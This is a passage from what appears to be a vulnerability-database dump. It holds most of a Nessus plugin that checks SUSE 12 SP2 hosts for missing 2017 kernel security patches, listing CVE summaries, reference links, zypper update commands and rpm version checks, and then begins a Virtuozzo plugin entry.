kernel\n allowed local users to cause a denial of service (panic)\n by leveraging incorrect length validation (bnc#1059051).\n\n - CVE-2017-15649: net/packet/af_packet.c in the Linux\n kernel allowed local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind) that\n leads to a use-after-free, a different vulnerability\n than CVE-2017-6346 (bnc#1064388).\n\n - CVE-2017-7518: The Linux kernel was vulnerable to an\n incorrect debug exception(#DB) error. It could occur\n while emulating a syscall instruction and potentially\n lead to guest privilege escalation. (bsc#1045922).\n\n - CVE-2017-7541: The brcmf_cfg80211_mgmt_tx function in\n drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg8021\n 1.c in the Linux kernel allowed local users to cause a\n denial of service (buffer overflow and system crash) or\n possibly gain privileges via a crafted NL80211_CMD_FRAME\n Netlink packet (bnc#1049645).\n\n - CVE-2017-7542: The ip6_find_1stfragopt function in\n net/ipv6/output_core.c in the Linux kernel allowed local\n users to cause a denial of service (integer overflow and\n infinite loop) by leveraging the ability to open a raw\n socket (bnc#1049882).\n\n - CVE-2017-8831: The saa7164_bus_get function in\n drivers/media/pci/saa7164/saa7164-bus.c in the Linux\n kernel allowed local users to cause a denial of service\n (out-of-bounds array access) or possibly have\n unspecified other impact by changing a certain\n sequence-number value, aka a 'double fetch'\n vulnerability (bnc#1037994).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1006180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1011913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012382\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012829\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013887\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1019151\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1020657\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022476\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022743\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1022967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1023175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1024405\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1028173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1028286\"\n 
);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1029693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030552\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030850\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031784\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1033587\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1034762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036303\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1036632\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037344\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1037994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038583\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1038792\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040307\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1040351\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1041958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042314\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042778\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1043652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1044636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045154\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045563\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045922\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046682\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1046985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047121\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047343\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047354\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047487\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048155\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048221\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049483\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049486\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049603\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1049882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051059\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051239\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051478\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1051790\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052049\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052533\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052593\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052888\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053802\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1053919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1054084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055359\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055493\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055755\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1055896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056261\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056588\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1056982\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1057015\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058410\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1058507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1059465\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1060197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061017\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061046\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1061872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1063667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1064388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971975\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974215\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000252/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-10810/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11473/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-12154/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13080/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14051/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14106/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-14489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15649/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7518/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7541/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7542/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-8831/\"\n );\n # 
https://www.suse.com/support/update/announcement/2017/suse-su-20172869-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?baed955d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP2:zypper in -t patch\nSUSE-SLE-WE-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Server for Raspberry Pi 12-SP2:zypper in -t\npatch SUSE-SLE-RPI-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Server 12-SP2:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Live Patching 12:zypper in -t patch\nSUSE-SLE-Live-Patching-12-2017-1786=1\n\nSUSE Linux Enterprise High Availability 12-SP2:zypper in -t patch\nSUSE-SLE-HA-12-SP2-2017-1786=1\n\nSUSE Linux Enterprise Desktop 12-SP2:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP2-2017-1786=1\n\nSUSE Container as a Service Platform ALL:zypper in -t patch\nSUSE-CAASP-ALL-2017-1786=1\n\nOpenStack Cloud Magnum Orchestration 7:zypper in -t patch\nSUSE-OpenStack-Cloud-Magnum-Orchestration-7-2017-1786=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.90-92.45.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.90-92.45.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if 
(tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T09:13:15", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - ChunYu Wang from Red Hat found a netlink use-after-free\n issue by syzkaller. Access to already freed memory\n (groups in struct netlink_sock) could cause host crash\n or memory corruption.\n\n - An unprivileged user inside a container could cause a\n denial of service (kernel crash in user_read()\n function) using a specially crafted sequence of system\n calls.\n\n - The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel\n through 4.13.2 allows local users to cause a denial of\n service (panic) by leveraging incorrect length\n validation.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 33, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2017-09-25T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-083)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489"], "modified": "2017-09-25T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-083.NASL", "href": "https://www.tenable.com/plugins/nessus/103426", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103426);\n script_version(\"3.9\");\n 
